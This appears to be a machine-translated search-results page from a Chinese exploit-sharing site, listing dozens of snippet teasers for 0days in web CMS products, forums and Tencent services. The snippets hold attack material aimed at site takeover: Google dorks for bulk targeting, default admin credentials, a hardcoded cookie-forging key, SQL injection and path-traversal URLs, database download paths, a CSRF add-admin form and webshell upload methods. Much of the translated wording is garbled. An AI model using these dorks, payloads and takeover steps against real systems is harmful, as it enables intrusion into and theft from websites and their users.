7620 matches found
BeeSns microblogging system V0.2 elevation of privilege 0day and exp-vulnerability warning-the black bar safety net
Publishing author: sub-meter Affected versions: BeeSns V0.2 Official address: http://www.beesns.com/ Vulnerability type: elevation of privilege Vulnerability analysis: IP filtering is not strict, so a user can submit malicious parameters to elevate their own privileges. This microblogging...
Quick.CMS v3.0 CSRF flaws and fixes-vulnerability warning-the black bar safety net
Exploit Title: Quick CMS v3.0 Cross Site Request Forgery Add Admin User + Author : ^Xecuti0n3r + E-mail : xecuti0n3ryahoo.com + Category : Web Apps XSRF + Dork : intext:"Quick.Cms v3.0" inurl:admin.php + Demo CMS Link: http://opensolution.org/Quick.Cms 1 1 0 I'm ^Xecuti0n3r member from...
DiscuzX1.5 portal management permissions SQL injection bug-vulnerability warning-the black bar safety net
Discuz! X is a community-based professional site-building platform launched by Kangsheng Chuangxiang (Comsenz). It fully integrates the forum (BBS), the personal space (SNS), the portal (Portal), groups (Group), applications and the open platform (Open Platform) in one, helping websites realize one-stop service...
ESPCMS v5.0 administrator login bypass EXP-vulnerability warning-the black bar safety net
Publishing author: sub-meter Vulnerability type: cookie spoofing Vulnerability analysis: the backend pages have a cookie authentication vulnerability that allows spoofing one's way into the backend. EXP: ? function eccode$string, $operation='DECODE', $key='@LFK24s224%@safS3s%1f%' $result = "; if...
Dcore (lightweight CMS) backend shell method and fix-vulnerability warning-the black bar safety net
Author: Mr. DzY Increase the style with the site table of the Association; Backend: admin/login.asp; if it does not exist, guess it yourself. Injection point: http://www.xxxx.net/index.asp?subsite=1 In the tool, add the table name: dcoreuser column names: useradmin userpassword If not...
Multiple unfixed Tencent bugs-bug warning-the black bar safety net
By Superhei, Sunday, April 24, 2011. One: the evil filterflag. The filterflag issue was first reported in April 2009 in the article "QQmail Multiple Xss Vulnerabilities", but to this day the problem has not been completely resolved. Multiple functions can trigger it, the most direct featu...
SiteServer CMS latest mass site takeover 0DAY-vulnerability warning-the black bar safety net
SiteServer CMS Web Content Management System (copyright registration number 2008SR15710) is a content management system positioned at the high end of the CMS market; with it, it is possible at the lowest cost, with minimal human input and in the shortest period of time, to set up a fully functional, excellent performance,...
Java floating-point value denial of service vulnerability hazard analysis-vulnerability warning-the black bar safety net
By emptiness prodigal heart http://www.inbreak.net/ A Java vulnerability, CVE-2010-4476, can result in a denial of service attack. In the bulletin, everyone saw a rather long piece of code. Meaning only the developers to write such code only on the server. We certainly will...
PHP code execution vulnerability reference summary-vulnerability warning-the black bar safety net
1. Code execution functions: PHP functions that can execute code, such as eval, assert, system, exec, shell_exec, passthru, escapeshellcmd, pcntl_exec, etc. demo code 1.1: 2. File inclusion code injection: the file inclusion functions in the specific...
phpstcms (STCMS music system) backend authentication bypass method-vulnerability warning-the black bar safety net
Published author: the mind Vulnerability type: backend verification Vulnerability analysis: a music system-0-in! Throw in the hard disk is also equal to moldy, classic white look at the code. The vulnerability exists in the "common.inc.php" file, as follows. phpstcms STCMS music system to bypass the...
360 Web Manager 3.0 multiple defects and fixes-vulnerability warning-the black bar safety net
Exploit Title: Multiple vulnerabilities in 360 Web Manager 3.0 Google Dork: "Powered by a 360 Web Manager 3.0" Date: 15/04/2011 Author: Ignacio Garrido Contact: [email protected] Software Link: www.360webmanager.com Version: v3.0 Tested on: Linux 2.6.18 Vulnerability description: 360 Web...
SoftMP3 SQL injection flaws and fixes-vulnerability warning-the black bar safety net
Exploit Title: SOFTMP3 source code SQL injection Date: 23/04/2011 Author: mArTi Software Link: http://softmp3.org/ Version: No others versions available... Tested on: Windows / Unix Introduction: SoftMP3 released a source...
Amanda enterprise website system cookie injection vulnerability 0day-vulnerability warning-the black bar safety net
amanda/cgProductShow.asp: <%@ LANGUAGE = VBScript.Encode %> <!-- #include file="Inc/SysProduct.asp" --> <% ShowSmallClassType=ShowSmallClassTypeArticle dim ID ID=trim(request("ID")) if ID="" then response.Redirect("cgProduct.asp") end if...
CGSAIL website management system 0day-vulnerability warning-the black bar safety net
<!-- #include file="lockip/lockyou.asp" --> <!-- #include file = cgsailconn.asp --> <!-- #include file = Include/cgsailpubcls.asp --> <% dim sql dim rs sql = "select * from "&CgsailPrefix&"admin where id="&request("id") Set rs = Server.CreateObject("ADODB.RecordSet") rs.Open sql,conn,1,1 photo=trim(rs("photo")) %>...
PHPBoost 3.0 backup vulnerability-vulnerability warning-the black bar safety net
Title : PHPBoost 3.0 Remote Download Backup Vulnerability Author : KedAns-Dz E-mail : [email protected] Home : HMD/AM 30008/04300 - Algeria -00213555248701 Twitter page : twitter.com/kedans platform : php Impact : Download Backup Database .sql File Tested on : Windows XP sp3 FR Note...
Network fun site management system-upload vulnerability-vulnerability warning-the black bar safety net
Program: web fun Site Management System 1.2.1 (both the dynamic version and the static version have this vulnerability) Download: http://www.codepub.com/d/downpage.php?n=1&id=18716::1288173021 FROM: http://www.st999.cn/blog DATE: 2010/04/22 Usage: /kuedit/ComquUp...
Color shadow space photography management system 4.0 Personal Edition login authentication file vulnerability-vulnerability warning-the black bar safety net
The color of the contrast space photographic studio management system is applicable to all types of photography studios, photography agencies and personal photography websites. The photography management system backend login directory is admin. The default...
Concave Yaya article system injection vulnerability analysis-vulnerability warning-the black bar safety net
Article author: small ice Last night, while penetrating a local university website, I found a sub-site using the concave Yaya news publishing system. At the time I searched the Internet for vulnerabilities in the system but did not find anything, so they own out of the sleeve 4. 7A...
Hero Wide-WEB Site arbitrary file download 0DAY vulnerability-vulnerability warning-the black bar safety net
I happened to notice the address that pops up when downloading the player: http://10.0.2.100/web/html/download.asp?file=../../herotemp/jtplayer.exe Looking at the download.asp source code: <% Dim path path=Request.QueryString("file") If path<>"" Then On Error Resume Next path=Server.MapPath(path) downloadfilepath End I...
Thousands of brain cloud disk tasteless vulnerability of ordinary uploads change VIP download-vulnerability warning-the black bar safety net
Thousands of brain home to open the Upload File address, out of the connection is: If the "justupload.jsp?id=" back content into any user name, for example administrator account: webtomos it. That upload address with the following: Upload files, on to VIP download. File test address: ---...
Panshi China asp the backstage management system upload vulnerability and fix-vulnerability warning-the black bar safety net
By: Red snow Official: http://www.chpanshi.net/ Ver: asp Enterprise version, the background structure is substantially a touch of the same. Large cattle bypass, this no technical content, just speak from experience, guys don't yell at me for. (Thank you Allen upx8 invitation code Nothing else, op...
K6dvd music network 0day (bypass anti-injection)-vulnerability warning-the black bar safety net
K6dvd television system is the domestic good music leave management system! Just find a URL with a parameter and submit a ' and it returns the following: ! Well, an anti-injection system! Most friends who do penetration testing should have seen it: Illegal operation! The syst...
Fire article back office management system V2.1 0day-vulnerability warning-the black bar safety net
The Fire article backend management system uses two-level classification; the interface is simple and clean, the features are simple and easy to use, it can automatically upload remote pictures, and when an article is deleted its related images are also deleted, reducing junk files. First open the...
Alcassoft's SOPHIA CMS SQL injection vulnerability-vulnerability warning-the black bar safety net
Alcassoft's SOPHIA is an international, powerful content management system. A SQL injection vulnerability exists in the dsppage.cfm file of Alcassoft's SOPHIA that could lead to sensitive information disclosure. Title : Alcassoft's SOPHIA CMS is Vulnerable to SQL Injection Found by: p0pc0rn 24/02/2011 We...
Simple article management system cookie injection vulnerability affecting all versions-bug warning-the black bar safety net
The Simple article management system uses single-level classification; the interface is simple and the features are simple and practical. When an article is deleted, its related images are also deleted, reducing junk files. The backend management entrance is http://Domain/admin; the username and password are both admin. Backend module:...
Spirit news enterprise website system v1.1 SQL injection exploit-vulnerability warning-the black bar safety net
Version 1.1 of the Spirit news Business Site System fixes the parameter assignment problem of the search box. The parameter passing in the product display page was rewritten; now the product display page can also be opened directly without passing parameters, and by default it shows all products. productview.asp...
Tencent WEB QQ file transfer tasteless vulnerability and fix-vulnerability warning-the black bar safety net
Brief description: special characters in the file name are not checked or restricted. Detailed description: 2011-04-12 22:40:58 The other side has agreed to receive "C:\fakepath\1.asa;.jpg", began to transfer files. 2011-04-12 22:41:02 File "1.asa" the transfer is successful...
DZ-X1.5 Forum latest backend WebShell method-vulnerability warning-the black bar safety net
Discuz! X is a community-based professional site-building platform launched by Kangsheng Chuangxiang (Comsenz). It fully integrates the forum (BBS), the personal space (SNS), the portal (Portal), groups (Group), applications and the open platform (Open Platform) in one, helping websites realize one-stop service. Look...
QQ the auction system ewebeditor exploit bulk take Station-vulnerability warning-the black bar safety net
Batch keyword: inurl:QQsales.asp Backend address: http://www.xxx.com/editer/adminlogin.asp Default account: admin admin If the password is wrong, you can download: http://www.xxxx.com/editer/db/ewebeditor.mdb, and then read the password...
SoftXMLCMS upload 0day exploit-vulnerability warning-the black bar safety net
SoftXMLCMS includes an integrated HTML content display and a CMS template. All this will give you a set of tools for creating a professional website in minimum time and in a cost-effective manner. SoftXMLCMS is written in JavaScript ASP IIS classics, and asked Microsoft and support...
Cherry enterprise website management system v1.0 upload vulnerability-vulnerability warning-the black bar safety net
The Cherry enterprise website management system uses full DIV+CSS templates and is compatible with IE6-IE8, Firefox, Google and other standards-compliant browsers; the template styles are centralized in one CSS stylesheet, with content and style completely separated, which is convenient for website designers to develo...
EZ-Shop V1.02 SQL injection vulnerability-vulnerability warning-the black bar safety net
The specialoffer.php page of EZ-Shop V1.02 has an injection vulnerability that allows administrator information to be queried by injection. MySQL version injection query: /specialoffer.php?specialid=1' union select 1,2,concat0x312720756e696f6e2073656c65637...
Easy day technology Mall 2.1 Free Edition IIS6 parsing exploits-vulnerability warning-the black bar safety net
Easy day micro Mall is the only official service website of E-day technologies. It provides professional e-commerce services, including a free online store system, design and development of supply information publishing systems, Taobao brush drill service and shop agent extension services. The exploit:...
Webmaster content Alliance background Cookie spoofing exploit-vulnerability warning-the black bar safety net
Webmaster content Alliance is one of the most widely used thief programs in China, but its backend verification is not strict: through cookie spoofing, one can bypass authentication, enter the backend directly and get a webshell. Website content Alliance, presumably most webmasters are aware o...
W78 enterprise website backend management system ewebeditor 5.5 exploit-vulnerability warning-the black bar safety net
w78CMS enterprise website management system is an open source ASP CMS tailored for enterprise users, providing a variety of page templates, business website templates, free enterprise web systems, automatic site-building systems, all-round business...
phpwind (manage.php)SQL injection exploit-vulnerability warning-the black bar safety net
PHPWind is a powerful system that runs on PHP+MySQL and can generate HTML pages. We hope that, as open source, shared software, PHPWind's smooth speed and high load capacity will arouse your enthusiasm to join the PHPWind camp! Together to create a...
Phpspy 2010 shell authentication bypass exploit-vulnerability warning-the black bar safety net
Phpspy 2010 shell is angel webshell 3 Musketeers sword. The 2010 version builds on phpspy 2009, with the code once again streamlined and optimized. It adds support for oracle, sybase, db2, etc. The phpspy code has many unscientific places. However functionally the letter is already PHPshell inside, one ...
BigAce 2.7.5 content management system, FCK editor upload vulnerability-vulnerability warning-the black bar safety net
BIGACE is a Web Content Management System (CMS) developed with PHP and MySQL. The problem is mainly the FCK editor. Many sites would have been quite safe, but these so-called editors led to tragedy. This is a...
pub918 software company website system 1.3 multiple vulnerabilities-vulnerability warning-the black bar safety net
pub918 software company site system is a good-looking corporate type website. Backend username and password: admin Download: http://www.mycodes.net/25/4040.htm Backend: admin/ Default database: admin/db/N%23%23ews.mdb 1, The ewebeditor problem. Path:...
Graugon 1.3 SQL injection vulnerability-vulnerability warning-the black bar safety net
Graugon is a forum program. Version 1.3 has an injection vulnerability. Very few people in China seem to use it; it is popular abroad. Those who like to work on foreign sites can play with it. The test POC is as follows: <html><body onload="document.forms[0].submit()"><form method="POST" action=""><inp...
WordPress custom page plugin remote file inclusion vulnerability-vulnerability warning-the black bar safety net
A WordPress custom page plug-in has a remote file inclusion vulnerability. Plugin name: wp custom pages version: 0.5.0.1 If you have it installed, please hurry up and upgrade to the new version. Send a test. As follows: So, classmates who use WordPress, don't install too many plug-ins. One more more of a danger...
PHPCMS 2008 SP2 latest local file inclusion vulnerability-vulnerability warning-the black bar safety net
PHPCMS into the hardest hit. A vulnerability would allow people to storm out. 0day also often have. Nonsense not much said. Directly on the method. Take the shell method: Contains: admin/safe.inc.php file GET submitted data Will be generated under the root directory a word Encrypt the following...
Amanda enterprise web site management system database background upload get WebShell-vulnerability warning-the black bar safety net
Amanda enterprise website CMS system program download: http://www.mycodes.net/25/3430.htm Keywords: inurl:cgProductShow.asp? Background: amdin Default database: Databases\tb11.mdb Do not do anti-download, if you encounter...
ShopEx V4.8 (v4.84, v4.85) backend write WebShell-vulnerability warning-the black bar safety net
ShopEx, an online store system sales platform, is one of the earliest online shop software providers; it is currently the company with the longest continuous research and development of shop systems; it is currently the shop software provider with the highest domestic market share; is currently th...
Tencent Weibo information forgery vulnerability; other microblogs are also affected-vulnerability warning-the black bar safety net
Brief description: posts can be forged as coming from anyone on the microblog; an April Fools' day entertainment vulnerability, we know. Detailed description: In a microblog dialogue or broadcast, send: Test || @mA:I'm not mA This can impersonate mA huateng taking part in the dialogue. Vulnerability to prove: Repair...
Large power online distance learning platform 0DAY (National Electrical chase to eat)-vulnerability warning-the black bar safety net
Brief description: A long-standing vulnerability; the vendor is www.open.edu.cn. While tidying up the blog today I found this 0day can still be used, so I am publishing it. Multiple injection vulnerabilities; there is filtering etc. but it can be bypassed; the database connection configuration file is exposed,...
phpcms local contains a vulnerability caused by a write shell vulnerability, and delete arbitrary file vulnerability-vulnerability warning-the black bar safety net
by [email protected] phpcms2008 sp2 or sp4 even didn't look carefully These days a bug vulnerable., manufacturers ignored, is as install X, OK, the mood is unhappy. no matter so much. phpcms local contains to get the shell method, this article connected to a the phpcms the phpcmsauth result o...
DirectAdmin 0day-vulnerability warning-the black bar safety net
Generally, on a Linux virtual host it is difficult to escalate privileges and difficult to connect back. MSF and PHP that vulnerability is the exception. It may not be. If the DirectAdmin management platform is present, then you can be successful. The default login address is http://ip:2222/ In LINUX under...
.NET latest privilege escalation 0day, works across Windows versions-vulnerability warning-the black bar safety net
ps: this compiles successfully on the first try, without modification....... From: http://www.exploit-db.com/exploits/16940/ exploit-db comparison and kind, and is not compiled on the difficult side dish....... / Exploit Title: .NET Runtime Optimization Service Privilege Escalation Date: 03-07-2011...
syWebEditor editor latest 0day-vulnerability warning-the black bar safety net
The syWebEditor editor has an upload vulnerability, but also resolve the problem, with other the emergence of this vulnerability Editor. exp: http://www.tmdsb.com/syWebEditor/SelUploadFile.asp?obj=ProPhoto&fileType=gif%7Cjpg%7Cpng%7C&filePathType=1&filePath=/PhotoFile/ProFile/ After uploading the...